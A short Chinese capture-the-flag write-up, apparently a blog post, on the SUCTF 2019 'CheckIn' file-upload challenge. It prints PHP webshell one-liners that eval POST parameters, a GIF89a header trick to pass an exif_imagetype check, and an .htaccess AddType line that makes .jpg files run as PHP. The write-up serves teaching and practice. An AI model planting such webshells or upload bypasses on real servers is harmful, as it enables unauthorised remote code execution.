[SUCTF 2019]CheckIn

文章讲述了在遇到上传安全验证时,如何尝试绕过JS和MITM验证,通过修改文件后缀和利用exif_imagetype函数的验证漏洞,以及使用GIF89a文件头来上传PHP代码。通过上传.htaccess文件改变文件解析方式,最终成功链接shell并获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一眼看出,上传shell,然后先传一个简单的webshell

<?php eval(@$_POST['password']);?>

果不其然被拦截,然后尝试发现不是js验证,也不是mitm验证,改后缀发现也绕不过,直接改为jpg试试。

回显<? in contents!

那就换个木马试试

<script language='php'>eval($_POST['shell']);<scirpt>

再试试

回显exif_imagetype:not image!

这个函数的绕过就是在加上文件头绕过验证

添加gif文件头GIF89a就能进行绕过

我们要让这个文件作为php代码执行,所以在上传htaccess文件解释。

AddType application/x-httpd-php .jpg

链接shell,拿到flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值